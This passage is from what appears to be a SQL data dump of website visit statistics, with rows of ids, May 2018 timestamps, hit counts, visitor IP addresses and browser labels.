1,0,0,'54.36.148.122','other'),(238892,1525274670,2,2,0,0,'162.210.196.98','other'),(238893,1525274705,1,1,0,0,'54.36.148.64','other'),(238894,1525274731,1,1,0,0,'54.36.148.92','other'),(238895,1525274793,1,1,0,0,'62.205.134.182','other'),(238896,1525274903,1,1,0,0,'54.36.149.83','other'),(238897,1525275068,1,1,0,0,'54.36.149.4','other'),(238898,1525275208,1,1,0,0,'54.36.148.125','other'),(238899,1525275678,1,1,0,0,'54.36.149.101','other'),(238900,1525275746,1,1,0,0,'54.36.148.39','other'),(238901,1525275866,1,1,0,0,'178.154.200.8','other'),(238902,1525275870,1,1,0,0,'178.154.200.59','other'),(238903,1525275902,1,1,0,0,'54.36.148.132','other'),(238904,1525276289,1,1,0,0,'54.36.148.143','other'),(238905,1525276586,1,1,0,0,'54.36.148.20','other'),(238906,1525276623,1,1,0,0,'54.36.149.27','other'),(238907,1525276649,1,1,0,0,'54.36.149.72','other'),(238908,1525276700,1,1,0,0,'54.36.149.89','other'),(238909,1525276951,1,1,0,0,'213.136.77.168','chrome'),(238910,1525277032,1,0,1,0,'66.249.64.30',''),(238911,1525277035,1,1,0,0,'54.36.148.245','other'),(238912,1525277112,2,2,0,0,'216.244.66.237','other'),(238913,1525277346,1,1,0,0,'54.36.149.60','other'),(238914,1525277440,1,1,0,0,'54.36.148.141','other'),(238915,1525277676,1,1,0,0,'54.36.148.205','other'),(238916,1525278106,1,1,0,0,'54.36.149.106','other'),(238917,1525278193,1,1,0,0,'8.29.198.27','other'),(238918,1525278232,2,2,0,0,'91.196.178.168','chrome'),(238919,1525278285,1,1,0,0,'54.36.148.53','other'),(238920,1525278309,1,1,0,0,'54.36.148.81','other'),(238921,1525278449,1,1,0,0,'62.80.178.142','chrome'),(238922,1525278509,1,1,0,0,'54.36.148.122','other'),(238923,1525278743,1,1,0,0,'54.36.148.203','other'),(238924,1525278754,1,1,0,0,'54.36.149.67','other'),(238925,1525278904,1,1,0,0,'54.36.148.15','other'),(238926,1525279085,1,1,0,0,'46.219.216.93','chrome'),(238927,1525279275,1,1,0,0,'54.36.149.106','other'),(238928,1525279362,1,1,0,0,'54.36.148.94','other'),(238929,1525279670,1,1,0,0,'54.36.149.46','other'),(238930,1525279806,3,3,0,0,'216.244.66.237','other'),(238931,1525279894,1,1,0,0,'66.102.9.40','chrome'),(238932,1525280107,1,1,0,0,'54.36.149.49','other'),(238933,1525280210,2,2,0,0,'130.211.88.124','chrome'),(238934,1525280276,1,1,0,0,'54.36.149.6','other'),(238935,1525280340,1,1,0,0,'212.227.18.32','chrome'),(238936,1525280528,1,1,0,0,'54.36.148.172','other'),(238937,1525280532,1,1,0,0,'54.36.149.81','other'),(238938,1525280550,1,1,0,0,'54.36.149.77','other'),(238939,1525280572,1,1,0,0,'54.36.148.216','other'),(238940,1525280629,1,1,0,0,'149.56.84.240','chrome'),(238941,1525280858,1,1,0,0,'54.36.149.52','other'),(238942,1525280921,1,1,0,0,'54.36.148.193','other'),(238943,1525280931,1,1,0,0,'54.36.149.8','other'),(238944,1525281340,1,1,0,0,'54.36.148.27','other'),(238945,1525281392,1,1,0,0,'54.36.149.84','other'),(238946,1525281440,1,1,0,0,'212.115.253.177','chrome'),(238947,1525281568,1,1,0,0,'54.36.148.139','other'),(238948,1525281663,1,1,0,0,'54.36.149.85','other'),(238949,1525281694,1,1,0,0,'216.244.66.237','other'),(238950,1525281954,1,1,0,0,'164.132.49.223','chrome'),(238951,1525282042,1,1,0,0,'54.36.149.103','other'),(238952,1525282186,1,1,0,0,'178.154.171.88','other'),(238953,1525282205,1,1,0,0,'54.36.149.51','other'),(238954,1525282209,2,2,0,0,'193.233.155.200','chrome'),(238955,1525282277,1,1,0,0,'88.208.252.204','chrome'),(238956,1525282323,1,1,0,0,'54.36.148.195','other'),(238957,1525282429,1,1,0,0,'54.36.149.71','other'),(238958,1525282482,1,1,0,0,'54.36.148.154','other'),(238959,1525282524,1,1,0,0,'54.36.148.94','other'),(238960,1525282658,1,1,0,0,'54.36.148.231','other'),(238961,1525282677,1,1,0,0,'54.36.148.56','other'),(238962,1525282735,1,1,0,0,'54.36.149.31','other'),(238963,1525282970,1,1,0,0,'54.36.148.185','other'),(238964,1525282988,3,3,0,0,'216.244.66.237','other'),(238965,1525283056,1,0,1,0,'66.249.64.30',''),(238966,1525283235,1,1,0,0,'91.142.211.40','chrome'),(238967,1525283336,1,1,0,0,'54.36.148.161','other'),(238968,1525283372,1,1,0,0,'66.249.64.28','chrome'),(238969,1525283427,1,1,0,0,'219.94.163.193','chrome'),(238970,1525283506,1,1,0,0,'54.36.148.82','other'),(238971,1525283567,1,1,0,0,'37.73.201.49','chrome'),(238972,1525283599,1,1,0,0,'8.29.198.26','other'),(238973,1525283617,1,1,0,0,'54.36.148.61','other'),(238974,1525283824,1,1,0,0,'194.44.110.164','chrome'),(238975,1525284043,1,1,0,0,'178.154.200.28','other'),(238976,1525284134,1,1,0,0,'54.36.149.73','other'),(238977,1525284260,1,1,0,0,'54.36.149.4','other'),(238978,1525284331,1,1,0,0,'54.36.149.29','other'),(238979,1525284367,1,1,0,0,'178.95.156.5','chrome'),(238980,1525284608,1,1,0,0,'54.36.148.186','other'),(238981,1525284653,1,1,0,0,'216.244.66.237','other'),(238982,1525284691,1,1,0,0,'54.36.148.202','other'),(238983,1525284790,1,1,0,0,'54.36.149.8','other'),(238984,1525284931,1,1,0,0,'54.36.149.93','other'),(238985,1525284938,1,1,0,0,'188.230.43.254','other'),(238986,1525285294,1,1,0,0,'54.36.148.32','other'),(238987,1525285417,1,1,0,0,'66.249.70.25','chrome'),(238988,1525285418,1,1,0,0,'40.77.167.44','other'),(238989,1525285500,1,1,0,0,'54.36.149.98','other'),(238990,1525285521,1,1,0,0,'54.36.148.90','other'),(238991,1525285584,1,1,0,0,'91.196.178.104','chrome'),(238992,1525285588,1,1,0,0,'54.36.149.75','other'),(238993,1525285688,1,1,0,0,'54.36.149.24','other'),(238994,1525285807,1,1,0,0,'91.196.178.103','firefox'),(238995,1525285839,1,1,0,0,'216.244.66.237','other'),(238996,1525286259,3,3,0,0,'72.167.177.198','chrome'),(238997,1525286451,1,1,0,0,'103.26.41.215','chrome'),(238998,1525286472,1,1,0,0,'178.159.235.49','firefox'),(238999,1525286513,1,1,0,0,'178.154.200.45','other'),(239000,1525286554,2,2,0,0,'80.87.203.2','chrome'),(239001,1525286555,1,1,0,0,'46.211.146.165','chrome'),(239002,1525286609,1,1,0,0,'54.36.149.92','other'),(239003,1525286771,1,1,0,0,'54.36.148.122','other'),(239004,1525286902,1,1,0,0,'207.46.13.58','other'),(239005,1525287179,4,4,0,0,'216.244.66.237','other'),(239006,1525287284,1,1,0,0,'188.230.43.254','other'),(239007,1525287317,1,1,0,0,'54.36.148.234','other'),(239008,1525287404,1,1,0,0,'54.36.149.41','other'),(239009,1525287410,1,1,0,0,'66.249.64.30','chrome'),(239010,1525287425,1,1,0,0,'87.250.224.39','other'),(239011,1525287789,1,1,0,0,'54.36.148.24','other'),(239012,1525287795,1,1,0,0,'54.36.149.74','other'),(239013,1525287866,1,1,0,0,'54.36.148.56','other'),(239014,1525287916,1,1,0,0,'138.201.163.62','chrome'),(239015,1525287917,1,1,0,0,'94.73.150.73','chrome'),(239016,1525287980,1,1,0,0,'87.250.224.66','other'),(239017,1525288123,1,1,0,0,'186.202.126.163','chrome'),(239018,1525288139,1,1,0,0,'157.55.39.76','other'),(239019,1525288186,1,1,0,0,'54.36.149.93','other'),(239020,1525288270,3,3,0,0,'62.210.157.129','other'),(239021,1525288285,2,2,0,0,'95.216.19.59','other'),(239022,1525288300,1,1,0,0,'54.36.148.12','other'),(239023,1525288876,1,1,0,0,'54.36.148.14','other'),(239024,1525288900,1,1,0,0,'54.36.148.21','other'),(239025,1525288927,3,3,0,0,'37.53.224.100','chrome'),(239026,1525288941,1,1,0,0,'54.36.148.75','other'),(239027,1525288955,1,1,0,0,'66.249.64.29','chrome'),(239028,1525289025,1,1,0,0,'54.36.148.183','other'),(239029,1525289027,1,1,0,0,'8.29.198.27','other'),(239030,1525289324,1,1,0,0,'95.110.231.112','chrome'),(239031,1525289400,1,1,0,0,'54.36.148.83','other'),(239032,1525289414,1,1,0,0,'77.232.66.20','chrome'),(239033,1525289685,1,1,0,0,'188.230.43.254','other'),(239034,1525289722,1,1,0,0,'54.36.149.24','other'),(239035,1525289763,1,1,0,0,'93.125.99.77','chrome'),(239036,1525289875,1,1,0,0,'54.36.149.98','other'),(239037,1525289934,1,1,0,0,'46.133.49.113','chrome'),(239038,1525290052,1,1,0,0,'54.36.149.68','other'),(239039,1525290185,1,1,0,0,'54.36.148.54','other'),(239040,1525290288,2,2,0,0,'216.244.66.237','other'),(239041,1525290355,1,1,0,0,'54.36.148.27','other'),(239042,1525290365,1,1,0,0,'54.36.148.253','other'),(239043,1525290583,1,1,0,0,'78.47.80.240','other'),(239044,1525290606,3,3,0,0,'91.196.178.19','chrome'),(239045,1525290935,1,1,0,0,'54.36.148.184','other'),(239046,1525291032,1,1,0,0,'77.232.66.20','chrome'),(239047,1525291059,3,3,0,0,'178.20.159.183','chrome'),(239048,1525291160,3,3,0,0,'88.151.101.15','chrome'),(239049,1525291192,1,1,0,0,'54.36.148.160','other'),(239050,1525291272,1,1,0,0,'54.36.149.52','other'),(239051,1525291313,2,2,0,0,'184.168.200.215','chrome'),(239052,1525291323,1,1,0,0,'54.36.149.1','other'),(239053,1525291408,1,1,0,0,'185.98.7.164','chrome'),(239054,1525291688,1,1,0,0,'54.36.149.21','other'),(239055,1525291753,1,0,1,0,'66.249.64.30',''),(239056,1525291833,1,1,0,0,'54.36.148.208','other'),(239057,1525291857,1,1,0,0,'54.36.148.51','other'),(239058,1525292005,1,1,0,0,'54.36.149.65','other'),(239059,1525292125,1,1,0,0,'54.36.148.199','other'),(239060,1525292135,1,1,0,0,'54.36.148.207','other'),(239061,1525292207,1,1,0,0,'54.36.149.107','other'),(239062,1525292333,1,1,0,0,'66.249.70.27','chrome'),(239063,1525292387,2,2,0,0,'91.211.40.38','chrome'),(239064,1525292512,1,1,0,0,'54.36.148.171','other'),(239065,1525292711,3,3,0,0,'62.75.247.137','chrome'),(239066,1525292781,1,1,0,0,'54.36.148.57','other'),(239067,1525292798,1,1,0,0,'87.250.224.39','other'),(239068,1525292923,1,1,0,0,'141.8.142.29','other'),(239069,1525292933,1,1,0,0,'37.9.113.138','other'),(239070,1525292958,1,1,0,0,'54.36.148.56','other'),(239071,1525292980,4,4,0,0,'46.242.241.13','chrome'),(239072,1525293579,1,1,0,0,'54.36.148.90','other'),(239073,1525293581,2,2,0,0,'54.36.148.65','other'),(239075,1525293868,1,1,0,0,'54.36.149.3','other'),(239076,1525293892,1,1,0,0,'54.36.149.71','other'),(239077,1525293913,1,0,1,0,'66.249.64.30',''),(239078,1525294008,2,2,0,0,'217.61.0.54','chrome'),(239079,1525294072,1,1,0,0,'81.88.49.54','chrome'),(239080,1525294077,1,1,0,0,'81.88.49.6','chrome'),(239081,1525294183,1,1,0,0,'95.132.6.34','chrome'),(239082,1525294188,4,4,0,0,'91.134.248.253','chrome'),(239083,1525294326,3,3,0,0,'213.251.182.110','chrome'),(239084,1525294457,1,1,0,0,'8.29.198.26','other'),(239085,1525294495,1,1,0,0,'54.36.148.138','other'),(239086,1525294547,4,4,0,0,'200.242.209.152','chrome'),(239087,1525294703,1,1,0,0,'216.244.66.237','other'),(239088,1525294841,1,1,0,0,'54.36.148.176','other'),(239089,1525294896,1,1,0,0,'54.36.148.183','other'),(239090,1525294897,1,1,0,0,'54.36.149.74','other'),(239091,1525294992,1,1,0,0,'54.36.149.63','other'),(239092,1525295040,1,1,0,0,'54.36.148.106','other'),(239093,1525295111,1,1,0,0,'54.36.148.162','other'),(239094,1525295269,1,1,0,0,'37.9.113.138','other'),(239095,1525295351,1,1,0,0,'54.36.149.93','other'),(239096,1525295413,1,1,0,0,'54.36.148.38','other'),(239097,1525295505,2,2,0,0,'153.92.0.8','chrome'),(239098,1525295565,2,2,0,0,'46.4.24.66','chrome'),(239099,1525295642,1,1,0,0,'54.36.148.188','other'),(239100,1525295774,1,1,0,0,'66.249.64.30','chrome'),(239101,1525295885,1,1,0,0,'91.196.178.58','chrome'),(239102,1525295909,2,2,0,0,'50.63.164.149','chrome'),(239103,1525296086,1,1,0,0,'54.36.148.202','other'),(239104,1525296117,1,1,0,0,'40.77.167.44','other'),(239105,1525296195,1,1,0,0,'91.209.11.236','other'),(239106,1525296235,1,1,0,0,'216.244.66.237','other'),(239107,1525296347,1,1,0,0,'54.36.148.223','other'),(239108,1525296365,1,1,0,0,'54.36.148.17','other'),(239109,1525296523,1,1,0,0,'54.36.148.100','other'),(239110,1525297169,1,1,0,0,'54.36.149.53','other'),(239111,1525297199,3,3,0,0,'89.160.3.18','chrome'),(239112,1525297211,1,1,0,0,'37.9.113.56','other'),(239113,1525297237,2,2,0,0,'27.254.141.105','chrome'),(239114,1525297319,1,1,0,0,'54.36.149.12','other'),(239115,1525297364,1,1,0,0,'54.36.148.107','other'),(239116,1525297572,1,1,0,0,'54.36.148.140','other'),(239117,1525297584,1,1,0,0,'54.36.149.6','other'),(239118,1525297653,1,1,0,0,'54.36.148.109','other'),(239119,1525297900,1,1,0,0,'54.36.149.61','other'),(239120,1525298015,1,1,0,0,'81.169.144.135','chrome'),(239121,1525298035,1,1,0,0,'54.36.148.160','other'),(239122,1525298206,1,1,0,0,'54.36.148.60','other'),(239123,1525298240,1,1,0,0,'188.166.215.124','chrome'),(239124,1525298243,1,1,0,0,'54.36.148.215','other'),(239125,1525298265,1,1,0,0,'54.36.148.132','other'),(239126,1525298402,1,1,0,0,'54.36.148.175','other'),(239127,1525298584,1,1,0,0,'54.36.149.63','other'),(239128,1525298683,1,1,0,0,'54.36.148.98','other'),(239129,1525298754,1,1,0,0,'87.250.224.125','other'),(239130,1525298768,2,2,0,0,'62.80.178.142','chrome'),(239131,1525298846,2,2,0,0,'184.168.200.215','chrome'),(239132,1525298870,1,1,0,0,'75.99.84.98','chrome'),(239133,1525298908,1,1,0,0,'103.67.235.50','chrome'),(239134,1525298926,3,3,0,0,'104.131.109.36','chrome'),(239135,1525299043,2,2,0,0,'216.244.66.237','other'),(239136,1525299069,3,3,0,0,'213.251.182.106','chrome'),(239137,1525299231,2,2,0,0,'54.36.148.253','other'),(239138,1525299344,1,1,0,0,'178.255.215.94','other'),(239139,1525299465,1,1,0,0,'66.249.70.27','chrome'),(239140,1525299592,1,1,0,0,'54.36.148.36','other'),(239141,1525299691,1,1,0,0,'54.36.149.57','other'),(239142,1525299863,1,1,0,0,'8.29.198.25','other'),(239143,1525300154,1,1,0,0,'54.36.148.90','other'),(239144,1525300169,1,1,0,0,'193.34.145.202','chrome'),(239145,1525300242,1,1,0,0,'138.197.10.226','chrome'),(239146,1525300345,1,1,0,0,'155.130.134.33','chrome'),(239147,1525300466,24,24,0,0,'217.182.252.214','other'),(239148,1525301103,1,1,0,0,'178.154.200.59','other'),(239149,1525301204,1,1,0,0,'54.36.149.36','other'),(239150,1525301216,1,1,0,0,'54.36.148.68','other'),(239151,1525301309,1,1,0,0,'54.36.148.212','other'),(239152,1525301359,1,1,0,0,'54.36.149.48','other'),(239153,1525301643,1,1,0,0,'54.36.149.61','other'),(239154,1525301687,1,1,0,0,'216.244.66.237','other'),(239155,1525301709,1,1,0,0,'54.36.148.191','other'),(239156,1525301769,1,1,0,0,'54.36.149.44','other'),(239157,1525301814,1,1,0,0,'130.211.88.124','chrome'),(239158,1525302076,1,1,0,0,'141.8.142.29','other'),(239159,1525302111,1,1,0,0,'54.36.148.183','other'),(239160,1525302203,1,1,0,0,'185.98.7.164','chrome'),(239161,1525302253,1,1,0,0,'54.36.148.103','other'),(239162,1525302311,1,1,0,0,'54.36.148.138','other'),(239163,1525302512,1,1,0,0,'54.36.148.68','other'),(239164,1525302538,1,1,0,0,'54.36.148.165','other'),(239165,1525302738,1,1,0,0,'54.36.149.62','other'),(239166,1525302785,1,1,0,0,'54.36.148.83','other'),(239167,1525302824,1,1,0,0,'54.36.149.70','other'),(239168,1525302875,1,1,0,0,'54.36.148.151','other'),(239169,1525302952,4,4,0,0,'216.244.66.237','other'),(239170,1525303545,1,1,0,0,'54.36.148.245','other'),(239171,1525303575,2,2,0,0,'91.189.123.230','chrome'),(239172,1525303621,1,1,0,0,'54.36.148.138','other'),(239173,1525303694,1,1,0,0,'188.116.17.193','chrome'),(239174,1525303760,1,1,0,0,'54.36.148.49','other'),(239175,1525303814,1,1,0,0,'54.36.148.140','other'),(239176,1525303837,4,4,0,0,'50.63.164.149','chrome'),(239177,1525303857,2,2,0,0,'62.210.185.4','chrome'),(239178,1525304159,1,1,0,0,'54.36.148.246','other'),(239179,1525304192,1,1,0,0,'54.36.149.50','other'),(239180,1525304245,1,1,0,0,'54.36.148.107','other'),(239181,1525304354,1,1,0,0,'54.36.148.178','other'),(239182,1525304400,1,1,0,0,'54.36.148.179','other'),(239183,1525304401,1,1,0,0,'54.36.149.20','other'),(239184,1525304488,1,1,0,0,'54.36.148.183','other'),(239185,1525304787,1,1,0,0,'54.36.148.206','other'),(239186,1525304954,1,1,0,0,'54.36.149.7','other'),(239187,1525305273,1,1,0,0,'54.36.148.199','other'),(239188,1525305309,1,1,0,0,'8.29.198.27','other'),(239189,1525305362,1,1,0,0,'54.36.149.60','other'),(239190,1525305773,1,1,0,0,'54.36.148.139','other'),(239191,1525305793,1,1,0,0,'54.36.148.189','other'),(239192,1525306005,1,1,0,0,'54.36.148.102','other'),(239193,1525306440,1,1,0,0,'54.36.148.222','other'),(239194,1525306506,1,1,0,0,'54.36.149.51','other'),(239195,1525306625,1,1,0,0,'81.2.195.84','chrome'),(239196,1525306694,1,1,0,0,'37.9.113.80','other'),(239197,1525306698,1,1,0,0,'54.36.149.101','other'),(239198,1525306710,1,1,0,0,'54.36.148.86','other'),(239199,1525306713,2,2,0,0,'46.165.230.99','chrome'),(239200,1525306818,1,1,0,0,'54.36.148.47','other'),(239201,1525306873,1,1,0,0,'54.36.148.203','other'),(239202,1525306882,1,1,0,0,'54.36.148.190','other'),(239203,1525307208,2,2,0,0,'93.125.99.84','chrome'),(239204,1525307305,1,1,0,0,'81.88.49.29','chrome'),(239205,1525307342,1,1,0,0,'81.88.49.50','chrome'),(239206,1525307939,1,1,0,0,'141.8.142.74','other'),(239207,1525307962,1,1,0,0,'54.36.149.35','other'),(239208,1525308163,1,0,1,0,'66.249.64.30',''),(239209,1525308320,1,1,0,0,'54.36.148.45','other'),(239210,1525308334,1,1,0,0,'180.76.15.31','other'),(239211,1525308342,1,1,0,0,'54.36.149.62','other'),(239212,1525308444,1,1,0,0,'54.36.148.81','other'),(239213,1525308488,1,1,0,0,'185.18.196.224','chrome'),(239214,1525308510,1,1,0,0,'54.36.148.229','other'),(239215,1525308624,1,1,0,0,'91.134.248.253','chrome'),(239216,1525308695,1,1,0,0,'54.36.148.241','other'),(239217,1525308797,1,1,0,0,'216.244.66.237','other'),(239218,1525308909,1,1,0,0,'54.36.148.89','other'),(239219,1525308910,1,1,0,0,'54.36.149.36','other'),(239220,1525309367,1,1,0,0,'54.36.149.50','other'),(239221,1525309408,1,1,0,0,'54.36.149.15','other'),(239222,1525309457,1,1,0,0,'54.36.148.69','other'),(239223,1525309610,2,2,0,0,'207.46.13.62','other'),(239224,1525309649,1,1,0,0,'54.36.149.92','other'),(239225,1525309952,1,1,0,0,'212.227.18.32','chrome'),(239226,1525310047,1,1,0,0,'149.56.84.240','chrome'),(239227,1525310223,1,1,0,0,'185.98.7.126','chrome'),(239228,1525310238,2,2,0,0,'216.244.66.237','other'),(239229,1525310401,1,1,0,0,'213.251.182.105','chrome'),(239230,1525310419,1,0,1,0,'66.249.70.25',''),(239231,1525310447,1,1,0,0,'54.36.148.103','other'),(239232,1525310475,1,1,0,0,'54.36.148.206','other'),(239233,1525310509,1,1,0,0,'54.36.148.95','other'),(239234,1525310542,1,1,0,0,'54.36.149.73','other'),(239235,1525310691,1,1,0,0,'8.29.198.25','other'),(239236,1525310735,1,1,0,0,'54.36.148.28','other'),(239237,1525310771,1,1,0,0,'54.36.149.40','other'),(239238,1525310774,1,1,0,0,'54.36.148.121','other'),(239239,1525310858,1,1,0,0,'54.36.148.183','other'),(239240,1525310863,1,1,0,0,'95.108.213.24','other'),(239241,1525310876,1,1,0,0,'54.36.149.71','other'),(239242,1525310893,1,1,0,0,'54.36.148.204','other'),(239243,1525310897,1,1,0,0,'54.36.148.88','other'),(239244,1525310899,1,1,0,0,'54.36.148.80','other'),(239245,1525310956,1,1,0,0,'54.36.148.96','other'),(239246,1525310990,1,1,0,0,'54.36.149.79','other'),(239247,1525311465,1,1,0,0,'54.36.148.165','other'),(239248,1525311542,1,1,0,0,'54.36.148.85','other'),(239249,1525311600,1,1,0,0,'54.36.149.103','other'),(239250,1525311606,3,3,0,0,'91.98.98.50','chrome'),(239251,1525311610,2,2,0,0,'81.23.124.94','chrome'),(239252,1525311669,1,1,0,0,'54.36.148.141','other'),(239253,1525311725,1,1,0,0,'54.36.149.48','other'),(239254,1525311899,2,2,0,0,'54.36.148.200','other'),(239255,1525311947,1,0,1,0,'66.249.64.28',''),(239256,1525312009,1,1,0,0,'66.249.64.28','chrome'),(239257,1525312037,1,1,0,0,'54.36.148.253','other'),(239258,1525312159,1,1,0,0,'66.249.70.29','chrome'),(239259,1525312329,1,1,0,0,'54.36.148.128','other'),(239260,1525312352,1,1,0,0,'54.36.149.98','other'),(239261,1525312663,1,1,0,0,'54.36.148.120','other'),(239262,1525312703,1,1,0,0,'54.36.148.105','other'),(239263,1525312864,1,1,0,0,'54.36.149.68','other'),(239264,1525313140,1,1,0,0,'216.244.66.237','other'),(239265,1525313263,1,1,0,0,'37.9.171.95','chrome'),(239266,1525313394,4,4,0,0,'198.54.113.48','chrome'),(239267,1525313560,2,2,0,0,'91.134.248.253','chrome'),(239268,1525313588,1,1,0,0,'207.46.13.215','other'),(239269,1525313673,1,1,0,0,'91.98.98.50','chrome'),(239270,1525313702,4,4,0,0,'193.233.155.200','chrome'),(239271,1525313767,4,4,0,0,'184.168.200.161','chrome'),(239272,1525313892,1,1,0,0,'54.36.148.39','other'),(239273,1525313903,1,1,0,0,'54.36.148.209','other'),(239274,1525313921,1,1,0,0,'54.36.149.65','other'),(239275,1525314170,1,1,0,0,'216.244.66.237','other'),(239276,1525314224,1,1,0,0,'213.180.203.8','other'),(239277,1525314367,1,1,0,0,'178.255.215.94','other'),(239278,1525314469,1,1,0,0,'54.36.148.137','other'),(239279,1525314484,1,1,0,0,'54.36.148.91','other'),(239280,1525314752,1,1,0,0,'54.36.149.76','other'),(239281,1525314817,1,1,0,0,'54.36.148.246','other'),(239282,1525314897,2,2,0,0,'91.213.11.100','chrome'),(239283,1525314979,2,2,0,0,'54.36.149.101','other'),(239284,1525315024,1,1,0,0,'178.62.141.237','chrome'),(239285,1525315187,1,1,0,0,'54.36.149.41','other'),(239286,1525315198,1,1,0,0,'54.36.148.169','other'),(239287,1525315280,1,1,0,0,'54.36.148.34','other'),(239288,1525315381,1,1,0,0,'54.36.148.205','other'),(239289,1525315448,5,5,0,0,'180.166.45.148','chrome'),(239290,1525315495,1,1,0,0,'54.36.148.105','other'),(239291,1525315693,1,1,0,0,'54.36.149.6','other'),(239292,1525315821,1,1,0,0,'216.244.66.237','other'),(239293,1525315877,4,4,0,0,'186.215.78.234','chrome'),(239294,1525315891,1,1,0,0,'54.36.148.191','other'),(239295,1525315966,1,1,0,0,'157.55.39.76','other'),(239296,1525316062,1,1,0,0,'54.36.149.45','other'),(239297,1525316073,1,1,0,0,'54.36.148.176','other'),(239298,1525316162,1,1,0,0,'8.29.198.26','other'),(239299,1525316238,1,1,0,0,'138.201.163.62','chrome'),(239300,1525316431,1,1,0,0,'164.132.49.223','chrome'),(239301,1525316473,1,1,0,0,'178.154.200.32','other'),(239302,1525316607,5,5,0,0,'47.52.169.178','chrome'),(239303,1525316630,1,1,0,0,'54.36.148.255','other'),(239304,1525316686,1,1,0,0,'54.36.148.84','other'),(239305,1525316792,1,1,0,0,'54.36.149.78','other'),(239306,1525316886,1,1,0,0,'54.36.148.246','other'),(239307,1525316936,1,1,0,0,'54.36.149.96','other'),(239308,1525316946,1,1,0,0,'54.36.148.177','other'),(239309,1525316978,1,1,0,0,'54.36.148.125','other'),(239310,1525317484,2,2,0,0,'92.113.126.46','chrome'),(239311,1525317490,1,1,0,0,'207.46.13.215','other'),(239312,1525317688,3,3,0,0,'184.168.200.161','chrome'),(239313,1525317739,1,1,0,0,'54.36.149.84','other'),(239314,1525317746,1,1,0,0,'185.98.7.226','chrome'),(239315,1525318013,1,1,0,0,'54.36.148.197','other'),(239316,1525318134,1,1,0,0,'54.36.148.221','other'),(239317,1525318167,1,1,0,0,'185.18.196.224','chrome'),(239318,1525318372,1,1,0,0,'85.93.145.137','chrome'),(239319,1525318576,1,1,0,0,'54.36.149.91','other'),(239320,1525318638,1,0,1,0,'66.249.69.35',''),(239321,1525318689,2,2,0,0,'216.244.66.237','other'),(239322,1525318747,1,1,0,0,'54.36.148.101','other'),(239323,1525319074,1,1,0,0,'54.36.148.71','other'),(239324,1525319092,1,1,0,0,'54.36.148.229','other'),(239325,1525319115,1,1,0,0,'54.36.148.113','other'),(239326,1525319167,2,2,0,0,'192.241.136.79','chrome'),(239327,1525319214,1,1,0,0,'54.36.148.36','other'),(239328,1525319218,1,1,0,0,'54.36.148.48','other'),(239329,1525319223,1,1,0,0,'66.249.69.89','chrome'),(239330,1525319246,1,1,0,0,'66.249.69.39','chrome'),(239331,1525319263,1,1,0,0,'130.211.88.124','chrome'),(239332,1525319286,1,1,0,0,'185.98.7.102','chrome'),(239333,1525319295,1,1,0,0,'178.154.200.41','other'),(239334,1525319300,1,1,0,0,'54.36.149.96','other'),(239335,1525319374,2,2,0,0,'144.217.84.12','chrome'),(239336,1525319421,1,1,0,0,'54.36.149.25','other'),(239337,1525319442,2,2,0,0,'80.87.203.2','chrome'),(239338,1525319483,1,1,0,0,'54.36.148.25','other'),(239339,1525319485,3,3,0,0,'131.153.4.150','chrome'),(239340,1525319502,1,1,0,0,'141.8.132.22','other'),(239341,1525319537,1,1,0,0,'54.36.148.111','other'),(239342,1525319695,1,1,0,0,'54.36.148.158','other'),(239343,1525320049,1,1,0,0,'54.36.148.247','other'),(239344,1525320167,1,1,0,0,'54.36.148.94','other'),(239345,1525320241,1,1,0,0,'54.36.149.86','other'),(239346,1525320628,1,1,0,0,'54.36.149.89','other'),(239347,1525320630,1,1,0,0,'54.36.149.71','other'),(239348,1525320819,2,2,0,0,'202.172.28.199','chrome'),(239349,1525321103,1,1,0,0,'54.36.148.128','other'),(239350,1525321291,1,0,1,0,'66.249.69.39',''),(239351,1525321304,1,1,0,0,'81.88.49.28','chrome'),(239352,1525321328,1,1,0,0,'81.88.49.5','chrome'),(239353,1525321336,1,1,0,0,'81.88.49.40','chrome'),(239354,1525321518,1,1,0,0,'8.29.198.26','other'),(239355,1525321527,1,1,0,0,'54.36.148.56','other'),(239356,1525321663,1,1,0,0,'54.36.148.162','other'),(239357,1525321683,4,4,0,0,'216.244.66.237','other'),(239358,1525321731,1,1,0,0,'141.8.142.123','other'),(239359,1525321920,1,1,0,0,'54.36.149.39','other'),(239360,1525322275,1,1,0,0,'54.36.148.15','other'),(239361,1525322355,1,1,0,0,'54.36.149.94','other'),(239362,1525322371,1,1,0,0,'54.36.148.221','other'),(239363,1525322762,1,1,0,0,'54.36.148.73','other'),(239364,1525322763,1,1,0,0,'37.9.113.138','other'),(239365,1525323061,1,1,0,0,'141.8.142.123','other'),(239366,1525323279,1,1,0,0,'54.36.149.5','other'),(239367,1525323731,1,1,0,0,'178.154.200.8','other'),(239368,1525323889,1,1,0,0,'54.36.148.90','other'),(239369,1525323946,1,1,0,0,'54.36.148.187','other'),(239370,1525324303,2,2,0,0,'216.244.66.237','other'),(239371,1525324336,1,1,0,0,'66.249.69.93','chrome'),(239372,1525324393,1,1,0,0,'54.36.149.73','other'),(239373,1525324695,1,1,0,0,'54.36.148.94','other'),(239374,1525324773,1,1,0,0,'54.36.148.80','other'),(239375,1525324829,1,1,0,0,'54.36.148.253','other'),(239376,1525324943,1,1,0,0,'54.36.148.125','other'),(239377,1525325044,1,1,0,0,'54.36.148.93','other'),(239378,1525325128,1,1,0,0,'54.36.149.43','other'),(239379,1525325154,1,1,0,0,'92.112.38.64','chrome'),(239380,1525325187,1,1,0,0,'54.36.148.239','other'),(239381,1525325196,1,1,0,0,'188.230.43.254','other'),(239382,1525325210,1,1,0,0,'54.36.148.96','other'),(239383,1525325242,1,1,0,0,'54.36.148.189','other'),(239384,1525325270,1,1,0,0,'138.197.172.215','chrome'),(239385,1525325364,1,1,0,0,'37.9.113.74','other'),(239386,1525325595,1,1,0,0,'188.120.231.114','chrome'),(239387,1525325823,1,1,0,0,'54.36.148.57','other'),(239388,1525325832,2,2,0,0,'213.251.182.110','chrome'),(239389,1525325886,1,1,0,0,'54.36.148.117','other'),(239390,1525325887,1,1,0,0,'5.166.128.72','chrome'),(239391,1525325989,1,1,0,0,'91.196.178.87','firefox'),(239392,1525326052,2,2,0,0,'216.244.66.237','other'),(239393,1525326080,1,1,0,0,'54.36.148.163','other'),(239394,1525326091,3,3,0,0,'178.62.141.237','chrome'),(239395,1525326114,1,1,0,0,'54.36.148.247','other'),(239396,1525326186,1,1,0,0,'54.36.149.17','other'),(239397,1525326224,1,1,0,0,'54.36.148.170','other'),(239398,1525326278,4,4,0,0,'180.166.45.148','chrome'),(239399,1525326324,1,1,0,0,'54.36.148.76','other'),(239400,1525326347,1,1,0,0,'54.36.148.